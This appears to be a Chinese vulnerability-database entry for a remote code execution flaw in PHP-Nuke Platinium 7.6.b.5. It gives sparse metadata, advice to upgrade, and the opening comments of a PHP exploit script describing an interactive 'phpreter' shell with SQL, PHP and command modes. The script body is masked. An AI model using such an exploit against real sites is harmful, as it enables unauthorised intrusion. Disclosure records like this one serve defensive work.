PHP-Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit

基本字段

漏洞编号:
SSV-8893
披露/发现时间:
未知
提交时间:
2008-07-02
漏洞等级:
漏洞类别:
代码执行
影响组件:
PHP-Nuke
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.3KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
##
## PHP Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit
## Author: Charles "real" F. <charlesfol[at]hotmail.fr>
## Date: 02/07/08
##
## Note
## ****
## I modified a bit phpsploit for this exploit,
## because PHP Nuke plays with REQUEST_URI var ...
##
## Requirements
## ************
## register_globals=On
##
## phpreter
## ********
## phpreter is really easy to use:
## You can change mode using "mode=<mode>",
## with <mode> = sql, php or cmd
##
## If you want to understand how it work ...
## read the code.
##
## You can take look to unchunk() function, because
## I think you were many with this problem ...
##
#
# Configuration
#
$xpl = new phpsploit();
$xpl->agent('Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14');
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1080
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负